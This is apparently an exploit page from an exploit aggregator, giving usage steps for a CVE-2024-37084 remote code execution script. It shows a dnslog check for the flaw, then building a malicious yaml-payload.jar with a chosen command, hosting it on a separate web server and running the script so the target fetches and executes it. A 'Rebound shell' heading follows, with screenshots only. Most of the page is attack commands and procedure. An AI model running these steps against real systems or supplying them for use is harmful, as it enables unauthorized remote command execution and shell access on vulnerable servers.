## https://sploitus.com/exploit?id=4218439B-9CA7-592C-B2B6-826415150810
1. Use dnslog to detect whether CVE-2024-37084 vulnerability exists, Then manually check dnslog
`python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn`
2. then you can Execute system commands
**first:** Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java
![image](https://github.com/user-attachments/assets/bca82f8a-1b22-4cf8-adb9-96e5650153d2)
**after that:** Double-click the. py file to generate the yaml-payload.jar file.
![image](https://github.com/user-attachments/assets/c6964441-dc24-44a0-8ae4-c5bc3888e70d)
**after that:** Put yaml-payload.jar on the linux server and start a web service with python. Note: Every time you execute a different command, you need to rename yaml-payload.jar, that is, xx.jar that you access, with a different name every time. Otherwise the new command will not take effect.
The access path is as follows: http://192.168.67.133/yaml-payload.jar.
**finally:** Execute poc
`cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar`
![image](https://github.com/user-attachments/assets/13536acf-afb8-4e7d-adf8-629aab9b3157)
Enter the corresponding container to view and successfully execute the command.
![image](https://github.com/user-attachments/assets/910021ef-ec3d-4536-b4af-e0c8f86f2d2c)
**Rebound shell:**
![image](https://github.com/user-attachments/assets/24a0bfc1-62f3-4489-bd81-461c6a2955ea)
![image](https://github.com/user-attachments/assets/b6f7cecf-20cd-406e-9fc2-e1284719d7ac)